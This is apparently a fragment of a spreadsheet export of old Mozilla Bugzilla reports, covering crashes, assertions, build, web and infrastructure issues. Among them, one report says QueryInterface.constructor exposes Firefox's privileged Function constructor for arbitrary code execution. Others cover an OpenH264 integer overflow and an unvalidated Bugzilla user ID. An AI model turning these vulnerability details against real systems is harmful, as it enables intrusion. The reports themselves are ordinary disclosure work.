5. Observe the errors
Actual Results:  
Composer changes  to  which generates 4 validation errors
Expected Results:  
Composer should not induce errors.
Tested only with  
and charset=ISO-8859-1</t>
  </si>
  <si>
    <t>DEVELOPER_ENGAGEMENT-843978</t>
  </si>
  <si>
    <t>Mozilla Hacks</t>
  </si>
  <si>
    <t>DEVELOPER_ENGAGEMENT</t>
  </si>
  <si>
    <t>Mixed active content on hacks.mozilla.org</t>
  </si>
  <si>
    <t>+++ This bug was initially created as a clone of Bug #843977 +++
See https://hacks.mozilla.org/2012/11/hacking-firefox-os/.
Mixed content loads:
[23:10:40.712] GET http://www.youtube.com/embed/6bbo147yLKQ [HTTP/1.1 200 OK 101ms]
See http://apiblog.youtube.com/2011/02/https-support-for-youtube-embeds.html for how to fix this.</t>
  </si>
  <si>
    <t>CORE-963843</t>
  </si>
  <si>
    <t>WebRTC: Audio/Video</t>
  </si>
  <si>
    <t>OpenH264:  runtime error: signed integer overflow to pTCoeff</t>
  </si>
  <si>
    <t>Created attachment 8365398
testcase.264
In order to reproduce you need to compile OpenH264 with UBSan support.
export CC=$LLVM_HOME/build/bin/clang -fsanitize=undefined -fno-sanitize=vptr
export CXX=$LLVM_HOME/build/bin/clang++ -fsanitize=undefined -fno-sanitize=vptr
export LD=$LLVM_HOME/build/bin/clang++
export LDFLAGS=-fsanitize=undefined
make
codec/decoder/./core/src/parse_mb_syn_cavlc.cpp:784:32: runtime error: signed integer overflow: 134216161 * 26 cannot be represented in type 'int'
pTCoeff[j] = iLevel[i] * kpDequantCoeff[j 
I will hide this bug first because I am not sure how you would like me to treat this class of bugs.
Tested with https://github.com/cisco/openh264/commit/58c33b8ee8</t>
  </si>
  <si>
    <t>cdiehl</t>
  </si>
  <si>
    <t>BUGZILLA-330841</t>
  </si>
  <si>
    <t>Pick a standard term to mean change a bug's product</t>
  </si>
  <si>
    <t>[% ELSIF error == product_has_bugs %]
    [% title = BLOCK %]Product has [% terms.Bugs %][% END %]
    [% admindocslinks = {'products.html' =&gt; 'Administering products'} %]
    There are [% nb FILTER html %] [%+ terms.bugs %] entered for this product!
    You must reassign those [% terms.bugs %] to another product before you
    can delete this one.
--
Normally i'd write or say move not reassign. reassign usually relates to changing the assignee which doesn't relate to the task described above.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-60142</t>
  </si>
  <si>
    <t>12345</t>
  </si>
  <si>
    <t>BUGZILLA-319082</t>
  </si>
  <si>
    <t>new Bugzilla::User($uid) allows you to pass invalid $uid</t>
  </si>
  <si>
    <t>new() in User.pm doesn't make sure that its parameter is a valid integer. This allows me to edit a user with ID = 1k! Well PostgreSQL complains but MySQL is happy with that:
mysql&gt; select bug_id from bugs where bug_id=1k
+--------+
| bug_id |
+--------+
|      1 |
+--------+</t>
  </si>
  <si>
    <t>CORE-137852</t>
  </si>
  <si>
    <t>Basic HTTP AUTH using WWW-authenticate and 401 Unauthorized b0rked (ignores Realm sends stale data)</t>
  </si>
  <si>
    <t>I've been working on a site that authenticates using Basic HTTP Auth.  It assigns a realm based on the current time and sets the time in a cookie.  
At logout the cookie is removed and a new realm is generated.  This works correctly with Konqueror but Mozilla continues to send old data.
Here is the code in PHP (edited slightly):
----------------------------------------------------
$c = $HTTP_COOKIE_VARS[realm]
fwrite( $fp Cookie: $c User: $PHP_AUTH_USER Pass: $PHP_AUTH_PW\n )
// We must first declare what our realm should be
if( !($realm = $HTTP_COOKIE_VARS[realm] ))
{	$realm = License Admin -  . time()
	$HTTP_COOKIE_VARS[realm] = $realm
	Header( WWW-authenticate: basic realm=\$realm\ ) 
	Header( HTTP/1.0 401 Unauthorized ) 
	SetCookie( realm $HTTP_COOKIE_VARS[realm] time() + 3600 )
	// delete any stale info from the old realm
	$PHP_AUTH_USER = null
}
// If we have not authenticated ask for it
if( !$PHP_AUTH_USER )
{	Header( WWW-authenticate: basic realm=\$realm\ ) 
	Header( HTTP/1.0 401 Unauthorized ) 
	echo Text to see if user hits 'Cancel' 
	exit 
} 
// Verify the password for the user
if( passwd != $PHP_AUTH_PW )
{	Header( HTTP/1.0 401 Unauthorized )
	Header( WWW-authenticate: basic realm=\$realm\ ) 
	echo Text to see if the password is incorrect 
	exit
}
// Auto-logout: 1 hour
SetCookie( realm $HTTP_COOKIE_VARS[realm] time() + 3600 )
----------------------------------------------------
And here is the trace (mozilla 0.9.9 20020411)
----------------------------------------------------
Cookie:  User: admin Pass: passwd
Creating new realm: License Admin - 1019008891
Asking for a username/password
Cookie: License Admin - 1019008891 User: admin Pass: passwd
Cookie:  User: admin Pass: passwd
Creating new realm: License Admin - 1019008912
Asking for a username/password
Cookie: License Admin - 1019008912 User: sales Pass: passwd
Cookie: License Admin - 1019008912 User: admin Pass: passwd
----------------------------------------------------
What seems to happen is this:
I log in as Admin.
I do whatever.
I select Log out.
I try to log in again.
I am prompted for a username and password.
I log in as Sales
The next Authentication data is old (Admin).
I was just changing the realm to force a logout but Mozilla completely ignored this which I why I made it more elaborate.  I'm not sure if the 
less elaborate way would have worked or not because I assume that Mozilla would do the right thing.  After trying to debug my code and then 
creating the trace file I decided to try Konqueror which behaves as I would expect.  This leads me to believe that Mozilla is misbehaving.
I see no bug of this sort with bug 61681 - perhaps it should be added there too
Chris</t>
  </si>
  <si>
    <t>andreaio.it</t>
  </si>
  <si>
    <t>CORE-462929</t>
  </si>
  <si>
    <t>ASSERTION: We can't deal with objects that have the same classinfo but different offset tables with MathML element and other element</t>
  </si>
  <si>
    <t>Created attachment 346139
testcase
###!!! ASSERTION: We can't deal with objects that have the same classinfo but different offset tables.: 'offsets == mOffsets' file /Users/jruderman/central/js/src/xpconnect/src/xpcprivate.h line 1916
This assertion was added in bug 457897.</t>
  </si>
  <si>
    <t>WEBTOOLS_GRAVEYARD-407806</t>
  </si>
  <si>
    <t>Trying to add an existing user results in ugly error</t>
  </si>
  <si>
    <t>Trying to add an existing user results in this error:
user warning: Duplicate entry 'xxxxxxxxxxxx' for key 2 query: INSERT INTO users (mail name status pass init uid created) VALUES ('xxxxxxxxxxxxx' 'xxxxxxxxxxxx' 1 'd41d8cd9xxxxxxxx4e9800998ecf8427e' 'xxxxxxxxxxxxxxxxx' 28 1197325949) in /data/kubla.sm-cms01.mozilla.com/includes/database.mysqli.inc on line 151.
And this (incorrect) message:
Created a new user account. No e-mail has been sent.</t>
  </si>
  <si>
    <t>BUGZILLA-435114</t>
  </si>
  <si>
    <t>The description of the LDAPstarttls parameter is not displayed in editparams.cgi</t>
  </si>
  <si>
    <t>Created attachment 322016
patch v1
The param name is LDAPstarttls but the template has LDAPstartls (missing t). Consequently its description is never displayed in editparams.cgi.</t>
  </si>
  <si>
    <t>FIREFOX-371147</t>
  </si>
  <si>
    <t>about: should use about:logo again</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-400183</t>
  </si>
  <si>
    <t>New start page snippet icon needs to be uploaded - operation firefox</t>
  </si>
  <si>
    <t>This is for start page snippet #1:
http://www.mozilla.org/start-snippets/en/snippet-1.html
New icon image is attached to this bug and should be put into the following directory:
images/op_icon.png
The program goes live on Monday 10/22/07.</t>
  </si>
  <si>
    <t>FIREFOX-333416</t>
  </si>
  <si>
    <t>Clicking Live Bookmark loading... tries to load... something</t>
  </si>
  <si>
    <t>Mozilla/5.0 (Macintosh U Intel Mac OS X en-US rv:1.9a1) Gecko/20060408 Firefox/3.0a1 ID:2006041003
STR:
1. Load attached testcase to make it easy to add a slow-to-timeout feed
2. Add Live Bookmark with location bar icon
3. Open Live Bookmark folder click Live Bookmark loading... item
Expected:
Either no response at all or menu closing with no other action
Actual:
Alert: The URL is not valid and cannot be loaded.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-370091</t>
  </si>
  <si>
    <t>HTML only messages sent via lists server become blank messages on newsgroups</t>
  </si>
  <si>
    <t>If a person sends an 'HTML only' message to one of the mailing lists on lists.mozilla.org it shows up as a blank message (0 lines) in the corresponding newsgroup.</t>
  </si>
  <si>
    <t>CORE-338466</t>
  </si>
  <si>
    <t>Remove fine-grained update flags from svg</t>
  </si>
  <si>
    <t>The current SVG code has quite fine-grained flags for updating most of which were unused (as the style system doesn't give enough information about what has changed) or treated as the same thing by the renderer.  This patch removes and replaces them with state bits simplifying the code and reducing the size of path geometry and glyph frames.
First step in simplifying the region logic.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-486350</t>
  </si>
  <si>
    <t>Clear app cache on PriorArt in Authstage</t>
  </si>
  <si>
    <t>Please clear the app cache on priorart.
app/tmp/cache
Details:
We have a meeting this morning to look at Authstage so I'd like to fix this soon.
Thanks for your help.</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-235781</t>
  </si>
  <si>
    <t>XPInstall ignores user's umask when installing files</t>
  </si>
  <si>
    <t>When files are installed via XPInstall the user's umask is ignored.  The
XPInstall engine should respect the user's umask setting.  The problem code is here:
nsZipArchive::ExtractFile
http://lxr.mozilla.org/mozilla/source/modules/libjar/nsZipArchive.cpp#641
nsJAR::Extract
http://lxr.mozilla.org/mozilla/source/modules/libjar/nsJAR.cpp#251
both open the file with 0644 perms and then chmod the file to the appropriate
perms but this sidesteps any umask.
Just to make things more complicated the nsZipArchive is part of standalone
libjar where PR_Open is defined as fopen in zipstub.h so passing the file's
mode to PR_Open wouldn't work in that situation.
this bug contributed to problems in bug 231083.</t>
  </si>
  <si>
    <t>CORE-100310</t>
  </si>
  <si>
    <t>gfx base depends on string bundles</t>
  </si>
  <si>
    <t>in mozilla/gfx/src/nsDeviceContext.cpp we have two routines GetLocalizedBundle
and GetLocalizedString which are only used on windows. This creates an
unnecessary dependency on other platforms. 
I've moved these two routines into gfx/src/windows. Patch forthcoming.
CC'ing pavlov for r= blizzard for sr=</t>
  </si>
  <si>
    <t>TOOLKIT-411392</t>
  </si>
  <si>
    <t>Modules lists modules more than once</t>
  </si>
  <si>
    <t>Reported by timeless Jul 13 2007
What is the problem?
modules in crash reports lists libraries more than once if they're loaded
for readonly executable etc because each mode gets its own listing in
/proc/self/maps.
https://crash-reports.stage.mozilla.com/reports/report/index/8705e882-30f7-11dc-b3e3-001321b0783d#modules
What is the expected behavior?
Modules should only list files once
DejaVuLGCSans.ttf 		000000000000000000000000000000000 	DejaVuLGCSans.ttf
DejaVuLGCSans-Bold.ttf 		000000000000000000000000000000000 
DejaVuLGCSans-Bold.ttf
What happens instead?
Most modules are listed more than once resulting in a list that's at least
twice as long as it should be.
DejaVuLGCSans.ttf 		000000000000000000000000000000000 	DejaVuLGCSans.ttf
DejaVuLGCSans-Bold.ttf 		000000000000000000000000000000000 
DejaVuLGCSans-Bold.ttf
DejaVuLGCSans.ttf 		000000000000000000000000000000000 	DejaVuLGCSans.ttf
DejaVuLGCSans.ttf 		000000000000000000000000000000000 	DejaVuLGCSans.ttf
What version of the product are you using and on what OS?
stable linux</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS-692286</t>
  </si>
  <si>
    <t>ganeti on relabs05 is pitching a fit</t>
  </si>
  <si>
    <t>It looks like there are Python failures every 5 minutes.  It'd be nice to know what this is and fix it on the labs cluster rather than in production!
Oct  5 03:30:01 relabs05 python: abrt: detected unhandled Python exception in /usr/sbin/ganeti-noded
Oct  5 03:30:01 relabs05 abrtd: dumpsocket: New client connected
Oct  5 03:30:01 relabs05 abrtd: dumpsocket: Saved Python crash dump of pid 25238 to /var/spool/abrt/pyhook-1317810601-25238
Oct  5 03:30:01 relabs05 abrtd: dumpsocket: Socket client disconnected
Oct  5 03:30:01 relabs05 abrtd: Directory 'pyhook-1317810601-25238' creation detected
Oct  5 03:30:01 relabs05 abrtd: Crash is in database already (dup of /var/spool/abrt/pyhook-1313566201-10803)
Oct  5 03:30:01 relabs05 abrtd: Deleting crash pyhook-1317810601-25238 (dup of pyhook-1313566201-10803) sending dbus signal
Oct  5 03:30:01 relabs05 python: abrt: detected unhandled Python exception in /usr/sbin/ganeti-confd
Oct  5 03:30:01 relabs05 abrtd: dumpsocket: New client connected
Oct  5 03:30:01 relabs05 abrtd: dumpsocket: Saved Python crash dump of pid 25335 to /var/spool/abrt/pyhook-1317810601-25335
Oct  5 03:30:01 relabs05 abrtd: dumpsocket: Socket client disconnected
Oct  5 03:30:01 relabs05 abrtd: Directory 'pyhook-1317810601-25335' creation detected
Oct  5 03:30:01 relabs05 abrtd: Crash is in database already (dup of /var/spool/abrt/pyhook-1313566201-10803)
Oct  5 03:30:01 relabs05 abrtd: Deleting crash pyhook-1317810601-25335 (dup of pyhook-1313566201-10803) sending dbus signal
Oct  5 03:30:01 relabs05 python: abrt: detected unhandled Python exception in /usr/sbin/ganeti-rapi
Oct  5 03:30:01 relabs05 abrtd: dumpsocket: New client connected
Oct  5 03:30:01 relabs05 abrtd: dumpsocket: Saved Python crash dump of pid 25432 to /var/spool/abrt/pyhook-1317810601-25432
Oct  5 03:30:01 relabs05 abrtd: dumpsocket: Socket client disconnected
Oct  5 03:30:01 relabs05 abrtd: Directory 'pyhook-1317810601-25432' creation detected
Oct  5 03:30:01 relabs05 abrtd: Crash is in database already (dup of /var/spool/abrt/pyhook-1313566201-10803)
Oct  5 03:30:01 relabs05 abrtd: Deleting crash pyhook-1317810601-25432 (dup of pyhook-1313566201-10803) sending dbus signal
Oct  5 03:35:02 relabs05 python: abrt: detected unhandled Python exception in /usr/sbin/ganeti-noded
Oct  5 03:35:02 relabs05 abrtd: dumpsocket: New client connected
Oct  5 03:35:02 relabs05 abrtd: dumpsocket: Saved Python crash dump of pid 25595 to /var/spool/abrt/pyhook-1317810902-25595
Oct  5 03:35:02 relabs05 abrtd: dumpsocket: Socket client disconnected
Oct  5 03:35:02 relabs05 abrtd: Directory 'pyhook-1317810902-25595' creation detected
Oct  5 03:35:02 relabs05 abrtd: Crash is in database already (dup of /var/spool/abrt/pyhook-1313566201-10803)
Oct  5 03:35:02 relabs05 abrtd: Deleting crash pyhook-1317810902-25595 (dup of pyhook-1313566201-10803) sending dbus signal
Oct  5 03:35:02 relabs05 python: abrt: detected unhandled Python exception in /usr/sbin/ganeti-confd
Oct  5 03:35:02 relabs05 abrtd: dumpsocket: New client connected
Oct  5 03:35:02 relabs05 abrtd: dumpsocket: Saved Python crash dump of pid 25692 to /var/spool/abrt/pyhook-1317810902-25692
Oct  5 03:35:02 relabs05 abrtd: dumpsocket: Socket client disconnected
Oct  5 03:35:02 relabs05 abrtd: Directory 'pyhook-1317810902-25692' creation detected
Oct  5 03:35:02 relabs05 abrtd: Crash is in database already (dup of /var/spool/abrt/pyhook-1313566201-10803)
Oct  5 03:35:02 relabs05 abrtd: Deleting crash pyhook-1317810902-25692 (dup of pyhook-1313566201-10803) sending dbus signal
Oct  5 03:35:02 relabs05 python: abrt: detected unhandled Python exception in /usr/sbin/ganeti-rapi
Oct  5 03:35:02 relabs05 abrtd: dumpsocket: New client connected
Oct  5 03:35:02 relabs05 abrtd: dumpsocket: Saved Python crash dump of pid 25789 to /var/spool/abrt/pyhook-1317810902-25789
Oct  5 03:35:02 relabs05 abrtd: dumpsocket: Socket client disconnected
Oct  5 03:35:02 relabs05 abrtd: Directory 'pyhook-1317810902-25789' creation detected
Oct  5 03:35:02 relabs05 abrtd: Crash is in database already (dup of /var/spool/abrt/pyhook-1313566201-10803)
Oct  5 03:35:02 relabs05 abrtd: Deleting crash pyhook-1317810902-25789 (dup of pyhook-1313566201-10803) sending dbus signal
Oct  5 03:40:01 relabs05 python: abrt: detected unhandled Python exception in /usr/sbin/ganeti-noded
Oct  5 03:40:01 relabs05 abrtd: dumpsocket: New client connected
Oct  5 03:40:01 relabs05 abrtd: dumpsocket: Saved Python crash dump of pid 25952 to /var/spool/abrt/pyhook-1317811201-25952
Oct  5 03:40:01 relabs05 abrtd: dumpsocket: Socket client disconnected
Oct  5 03:40:01 relabs05 abrtd: Directory 'pyhook-1317811201-25952' creation detected
Oct  5 03:40:01 relabs05 abrtd: Crash is in database already (dup of /var/spool/abrt/pyhook-1313566201-10803)
Oct  5 03:40:01 relabs05 abrtd: Deleting crash pyhook-1317811201-25952 (dup of pyhook-1313566201-10803) sending dbus signal
Oct  5 03:40:01 relabs05 python: abrt: detected unhandled Python exception in /usr/sbin/ganeti-confd
Oct  5 03:40:01 relabs05 abrtd: dumpsocket: New client connected
Oct  5 03:40:01 relabs05 abrtd: dumpsocket: Saved Python crash dump of pid 26049 to /var/spool/abrt/pyhook-1317811201-26049
Oct  5 03:40:01 relabs05 abrtd: dumpsocket: Socket client disconnected
Oct  5 03:40:01 relabs05 abrtd: Directory 'pyhook-1317811201-26049' creation detected
Oct  5 03:40:01 relabs05 abrtd: Crash is in database already (dup of /var/spool/abrt/pyhook-1313566201-10803)
Oct  5 03:40:01 relabs05 abrtd: Deleting crash pyhook-1317811201-26049 (dup of pyhook-1313566201-10803) sending dbus signal
Oct  5 03:40:01 relabs05 python: abrt: detected unhandled Python exception in /usr/sbin/ganeti-rapi
Oct  5 03:40:01 relabs05 abrtd: dumpsocket: New client connected
Oct  5 03:40:01 relabs05 abrtd: dumpsocket: Saved Python crash dump of pid 26146 to /var/spool/abrt/pyhook-1317811201-26146
Oct  5 03:40:01 relabs05 abrtd: dumpsocket: Socket client disconnected
Oct  5 03:40:01 relabs05 abrtd: Directory 'pyhook-1317811201-26146' creation detected
Oct  5 03:40:01 relabs05 abrtd: Crash is in database already (dup of /var/spool/abrt/pyhook-1313566201-10803)
Oct  5 03:40:01 relabs05 abrtd: Deleting crash pyhook-1317811201-26146 (dup of pyhook-1313566201-10803) sending dbus signal
Oct  5 03:45:01 relabs05 python: abrt: detected unhandled Python exception in /usr/sbin/ganeti-noded
Oct  5 03:45:01 relabs05 abrtd: dumpsocket: New client connected
Oct  5 03:45:01 relabs05 abrtd: dumpsocket: Saved Python crash dump of pid 26307 to /var/spool/abrt/pyhook-1317811501-26307
Oct  5 03:45:01 relabs05 abrtd: dumpsocket: Socket client disconnected
Oct  5 03:45:01 relabs05 abrtd: Directory 'pyhook-1317811501-26307' creation detected
Oct  5 03:45:02 relabs05 abrtd: Crash is in database already (dup of /var/spool/abrt/pyhook-1313566201-10803)</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-222281</t>
  </si>
  <si>
    <t>Replace murder headline screenshot on Firebird Tour page</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.5) Gecko/20031007 Firebird/0.7
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.5) Gecko/20031007 Firebird/0.7
The Tab Browsing page of the otherwise excellent Mozilla Firebird Tour website
includes a screenshot of the CNN front page with a large photo and headline
reading: Killer Probably a Resident.
If it's just easy it would be nice to have a more benign screenshot here. The
photo and headline distract from the content of the page.
Reproducible: Always
Steps to Reproduce:
1. Go to http://www.mozilla.org/products/firebird/tour/
2. Wince at disturbing headline/photo</t>
  </si>
  <si>
    <t>MOZILLA_LABS-429107</t>
  </si>
  <si>
    <t>Fix up Mac build</t>
  </si>
  <si>
    <t>There a couple of issues with the Mac build. The app bundle has .svn folders in it. And the XUL.framework is included twice (1.9pre and Current).</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-229168</t>
  </si>
  <si>
    <t>Save Page (with mms:// embedded media) invokes Windows Media Player</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7a) Gecko/20031222
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7a) Gecko/20031222
.
Reproducible: Always
Steps to Reproduce:
1. Go to the URL
2. Ctrl+S and OK
Actual Results:  
Windows Media Player (WMP) window are invoked.
Expected Results:  
Just save the page without annoying WMP window
This happens only when the saved page has embedded media with src=mms://.</t>
  </si>
  <si>
    <t>isaachh</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-469129</t>
  </si>
  <si>
    <t>Execute db update script on support-stage.mozilla.org</t>
  </si>
  <si>
    <t>Created attachment 352538
run this script from command line -CLI PHP script to add poll questions and options with functioning check this time
The following script needs to be run on support-stage.mozilla.org asap for QA of bug 465518. It blocks 0.8 release.
run php chatCSAT_db_upgrade.php from the command line and specify your database information.</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-411637</t>
  </si>
  <si>
    <t>thunderbird es-ES dictionary shows an error in the word brevemente</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 es-ES rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11
Build Identifier: 2.0.0.9 (20071031)
The es-ES dictionary in Thunderbird shows an error in the Spanish word brevemente which is a correct word and should not be marked as an error.
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>dispiste</t>
  </si>
  <si>
    <t>SEAMONKEY-242412</t>
  </si>
  <si>
    <t>unable to save images generated by a script/cgi</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.8a) Gecko/20040428
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.8a) Gecko/20040428
The website http://www.fotos.web.de/sc01joe is using automatically submitted
HTML forms to show images. Example:
Mozilla displays those script-generated images on screen but cannot save them.
Reproducible: Always
Steps to Reproduce:
1. At http://www.fotos.web.de/sc01joe click the link named Eifeltour.
2. Open one of the JPG images listed there by means of clicking its name.
(JavaScript has to be enabled.)
3. Try to save the image.
Actual Results:  
Mozilla is saving the web.de login page using a file name like P1010058.JPG.html.
Expected Results:  
Save the image.</t>
  </si>
  <si>
    <t>s.a.moeller</t>
  </si>
  <si>
    <t>CORE-468546</t>
  </si>
  <si>
    <t>[FIX]Duplicated character with XBL float word-spacing</t>
  </si>
  <si>
    <t>Created attachment 352018
testcase 1
Testcase 1 shows the character 'j' being duplicated mysteriously.  I have no idea whether the rest of the rendering of this testcase is correct.</t>
  </si>
  <si>
    <t>CORE-489477</t>
  </si>
  <si>
    <t>Crash [@ nsFrameList::InsertFrame] with -moz-column contenteditable</t>
  </si>
  <si>
    <t>Created attachment 373949
testcase (crashes Firefox when loaded)
###!!! ASSERTION: Must only be called on reflowed lines: '!(GetStateBits() &amp; NS_FRAME_IS_DIRTY)' file /Users/jruderman/central/layout/generic/nsFrame.cpp line 4331
###!!! ASSERTION: prev sibling has different parent: 'aNewFrame-&gt;GetParent() == aPrevSibling-&gt;GetParent()' file /Users/jruderman/central/layout/generic/nsFrameList.cpp line 186
Crash [@ nsFrameList::InsertFrame] touching 0xddddddf9.</t>
  </si>
  <si>
    <t>CORE-396412</t>
  </si>
  <si>
    <t>Build 2007091623 crash [@ nsMenuPopupFrame::MoveToInternal] when using Ctrl-Tab extension</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9a8pre) Gecko/2007091623 Minefield/3.0a8pre
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9a8pre) Gecko/2007091623 Minefield/3.0a8pre
2007091623 build crashes every time on start up when ctrl-tab extension is installed.
Crash report:
0 nsMenuPopupFrame::MoveToInternal(int int) mozilla/layout/xul/base/src/nsMenuPopupFrame.cpp:1627
1 nsMenuPopupFrame::MoveToAttributePosition() mozilla/layout/xul/base/src/nsMenuPopupFrame.cpp:1574
2 nsMenuPopupFrame::AttributeChanged(int nsIAtom* int) mozilla/layout/xul/base/src/nsMenuPopupFrame.cpp:1546
3 nsCSSFrameConstructor::AttributeChanged(nsIContent* int nsIAtom* int unsigned int) mozilla/layout/base/nsCSSFrameConstructor.cpp:10099
4 PresShell::AttributeChanged(nsIDocument* nsIContent* int nsIAtom* int unsigned int) mozilla/layout/base/nsPresShell.cpp:4513
5 nsBindingManager::AttributeChanged(nsIDocument* nsIContent* int nsIAtom* int unsigned int) mozilla/content/xbl/src/nsBindingManager.cpp:1212
6 nsNodeUtils::AttributeChanged(nsIContent* int nsIAtom* int unsigned int) mozilla/content/base/src/nsNodeUtils.cpp:110
7 nsGenericElement::SetAttrAndNotify(int nsIAtom* nsIAtom* nsAString_internal const&amp; nsAttrValue&amp; int int int) mozilla/content/base/src/nsGenericElement.cpp:3642
8 nsGenericElement::SetAttr(int nsIAtom* nsIAtom* nsAString_internal const&amp; int) mozilla/content/base/src/nsGenericElement.cpp:3573
9 nsGenericElement::SetAttribute(nsAString_internal const&amp; nsAString_internal const&amp;) mozilla/content/base/src/nsGenericElement.cpp:1500
10 NS_InvokeByIndex_P mozilla/xpcom/reflect/xptcall/src/md/win32/xptcinvoke.cpp:101
11 AutoJSSuspendRequest::SuspendRequest() mozilla/js/src/xpconnect/src/xpcprivate.h:3317
12 js3250.dll@0x6869f 
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>ogirtd</t>
  </si>
  <si>
    <t>WEBTOOLS_GRAVEYARD-475207</t>
  </si>
  <si>
    <t>allow cross-site XMLHttpRequest for tinderbox quickparse.txt output</t>
  </si>
  <si>
    <t>Bug 393401 allowed this for the JSON output. I'd like to do the same thing for the quickparse.txt output. [I'd rather load the quickparse.txt format for my task it's only ~2K vs. 250K for the JSON.]
This is apparently going to be an Apache/IT config change but I thought I'd file it here first.
This header needs to be sent in the quickparse.txt HTTP reply:
Access-Control-Allow-Origin: *
[Note that the spec has changed since bug 393401]</t>
  </si>
  <si>
    <t>BUGZILLA-150153</t>
  </si>
  <si>
    <t>ConnectToDatabase/quietly_check_login issues.</t>
  </si>
  <si>
    <t>I did an audit of CGIs with regard to ConnectToDatabase and quietly_check_login.
 What I found was not good and needs to be fixed for rc3/final.
confirm_login is ok on it's own because it calls ConnectToDatabase itself.
No ConnectToDatabase before quietly_check_login
-----------------------------------------------
Results in the CGI dying in certain situations.
xml.cgi: No CTD.
colchange.cgi: CTD is done *after* qcl.
No quietly_check_login
----------------------
Results in a logged out footer.
quips.cgi
token.cgi: Possibly not a bug are there any situations in which it should?
createaccount.cgi: Probably not a bug given this shouldn't occur when you're
logged in anyway.
Stuff between ConnectToDatabase &amp; quietly_check_login
-----------------------------------------------------
Results in a logged out footer in some situations.
buglist.cgi: Definitely a bug try buglist.cgi?format=nonexistantformat.
describecomponents.cgi duplicates.cgi sidebar.cgi: Call GetVersionTable in
between maybe not a bug at the moment but could become one later if
GetVersionTable calls Throw*Error or the like.
queryhelp.cgi: Similar to above called SendSQL probably not a bug at the moment.</t>
  </si>
  <si>
    <t>CORE-461047</t>
  </si>
  <si>
    <t>Replace nsStringArray with nsTArray</t>
  </si>
  <si>
    <t>Maybe I'm missing something but nsStringArray is just an nsVoidArray of heap-allocated nsStrings. Seems like if we just used nsTArray instead we'd win all around: less code one less heap allocation per element ability to use nsAutoTArray when needed.</t>
  </si>
  <si>
    <t>FIREFOX-248330</t>
  </si>
  <si>
    <t>In full screen buttons at top are not on edge of screen</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7) Gecko/20040614 Firefox/0.9
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7) Gecko/20040614 Firefox/0.9
When Firefox is in full screen none of the buttons on the toolbar are clickable
at the very top of the screen. Fitts' Law states that the edge of screens are
easier to click.
Reproducible: Always
Steps to Reproduce:
1. Set Firefox to Full Screen
2. Put mouse cursor at very top of screen
3. try to click any button
Actual Results:  
Desired button was not clicked.
Expected Results:  
Button should be clicked.</t>
  </si>
  <si>
    <t>CORE-295011</t>
  </si>
  <si>
    <t>QueryInterface() allows arbitrary code execution</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/4.0 (compatible MSIE 6.0 Windows NT 5.1)
Build Identifier: Mozilla/5.0 (Windows U Win98 en-US rv:1.7.8) Gecko/20050511 Firefox/1.0.4
XPConnect wrapped native objects' QueryInterface method is a native
function which (erroneously) exposes the privileged Function constructor
as its constructor. Such privileged constructor can be accessed by an
expression such as QueryInterface.constructor and allows attackers
to construct and execute arbitrary privileged code.
Reproducible: Always
Steps to Reproduce:
1. load the testcase.
Actual Results:  
The privileged Function constructor can be accessed by
QueryInterface.constructor and allows to execute arbitary code.
Expected Results:  
The privileged Function constructor must not be accessable at all.
(QueryInterface.constructor == Function) is true.</t>
  </si>
  <si>
    <t>CORE-461031</t>
  </si>
  <si>
    <t>Investigate mobile responsiveness problems caused by not returning to the event loop</t>
  </si>
  <si>
    <t>Vlad wrote an instrumentation patch to see why Fennec running on VMs has serious responsiveness issues while loading heavy pages such as CNN.com. Part of his patch works by basically doing setTimout(0) and watching to see how long it takes before the setTimeouts fire. On a VM he saw a lot of setTimeouts firing at regular intervals followed by a massive slowdown (on the order of one second).
In a test run he saw the following event being handled:
{BM(44)BM(10)ES(94)BM(103)BM(7)BM(54)BM(18)BM(37)BM(33)BM(11)BM(17)BM(10)BM(21)BM(62)BM(20)BM(16)BM(20)BM(7)BM(40)BM(17)BM(92)RP4(676)-E(0xb1a53de0676)}
To translate: we're calling BuildModel a ton of times during the same event without ever returning to the event loop. The sum of all of the BuildModel calls is quite a lot and could explain the loss of responsiveness.
I realized that what this probably means is that we're executing a script with many calls to document.write() each of which calls into nsParser::BuildModel. In this case the parser won't ever interrupt (and even when it's done parsing we won't get all the way back out to the event loop). We could verify this by adding a printf around nsParser::ResumeParse to make sure that we're not sticking around in ResumeParse forever but actually entering and exiting the parser code.</t>
  </si>
  <si>
    <t>CORE-791574</t>
  </si>
  <si>
    <t>Use a Unix-compatible list2cmdline in jstests.py</t>
  </si>
  <si>
    <t>Sadly subprocess.list2cmdline only seems to do something sensible for Windows which I find rather bizarre.</t>
  </si>
  <si>
    <t>sphink</t>
  </si>
  <si>
